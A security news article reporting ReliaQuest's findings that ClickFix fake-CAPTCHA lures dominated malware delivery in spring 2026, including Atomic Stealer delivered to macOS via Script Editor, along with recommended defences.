“For enterprises, macOS must no longer be treated as lower risk and now needs the same monitoring and response coverage as Windows,” the ReliaQuest report warned.
ReliaQuest analysis: March 1–May 31, 2026 shows ClickFix dominance
Researchers at ReliaQuest examined cyber-attacks taking place between March 1 and May 31, 2026 and found that the ClickFix social engineering technique dominated malware delivery during that period. The firm's analysis identified ClickFix as the leading method cybercriminals used to get victims to run attacker-supplied commands inside trusted system dialogs, a step that often allows subsequent payloads to evade conventional defenses.
How ClickFix works: fake CAPTCHAs and pasted commands
ClickFix-style attacks commonly use compromised websites to present a fake CAPTCHA page that asks visitors to "verify they are human" by pasting a command. When a user pastes and runs that command, it can execute PowerShell code that retrieves infostealers or other malware payloads. ReliaQuest described the approach as potent because the user-provided execution is frequently classified as legitimate by anti-virus and other cyber defense tools, allowing malware to be delivered and run without triggering standard automated protections.
From Windows to macOS: Deepload and the first AMOS delivery
During the reporting period, ClickFix was observed delivering multiple malware families. ReliaQuest noted deployment of Deepload malware to Windows systems. Significantly, analysts observed ClickFix used for the first time to deliver Atomic Stealer (AMOS) to macOS users. AMOS attacks are designed to steal browser credentials, session cookies, crypto wallets and keychain data. In the macOS case, attackers used a browser-triggered workflow to launch Script Editor and encourage the user to enter commands there.
Apple's mitigation and attackers' shift to Script Editor
ReliaQuest reported that attackers had chosen to target Script Editor following an Apple update that attempted to counter ClickFix attacks by introducing a security feature that scans commands pasted into Terminal before execution and warns the user that the command could be malicious. By moving the workflow into Script Editor, attackers aimed to bypass the specific Terminal-focused scanning behavior introduced by Apple, leveraging a trusted application and the user's willingness to paste and run code.
Mitigations: training, simulated lures, and administrative controls
To help counter ClickFix, ReliaQuest recommended organizations train users on both Windows and macOS not to paste commands into Run, Terminal, or Script Editor and to simulate ClickFix-style lures during exercises. On the administrative side, the report advised restricting use of the run dialog and clipboard, restricting execution of potentially malicious executables, and blocking access to potentially malicious adverts and websites—measures aimed at reducing the opportunity for ClickFix workflows to reach and convince users to execute attacker-supplied commands.
What this means for enterprises and end users
- Enterprises and security teams: The finding that ClickFix dominated delivery between March and May 2026 and that it has been used to deliver AMOS to macOS indicates a shift in where monitoring and response resources need to be applied. ReliaQuest explicitly warned that macOS requires the same monitoring and response coverage as Windows.
- Network administrators: ReliaQuest's recommendations give clear technical levers—restricting run dialogs and clipboard use, blocking adverts and dangerous sites, and restricting execution of suspect executables—that can reduce successful ClickFix engagements.
- End users and training teams: Practical behavioral defenses are central. ReliaQuest advised training users not to paste commands into Run, Terminal, or Script Editor and testing that guidance with simulated lures on both platforms.
ReliaQuest’s analysis places ClickFix at the center of contemporary malware delivery: a social-engineering tactic that transforms trusted system dialogs into execution pipelines and that has now been applied to steal credentials and crypto assets on macOS as well as to deliver established Windows malware. The clear prescription from the report is dual: change user behavior through training and harden administrative controls so the next fake CAPTCHA or browser prompt cannot quietly become an execution vector.
https://www.infosecurity-magazine.com/news/clickfix-cybercriminals-favorite/
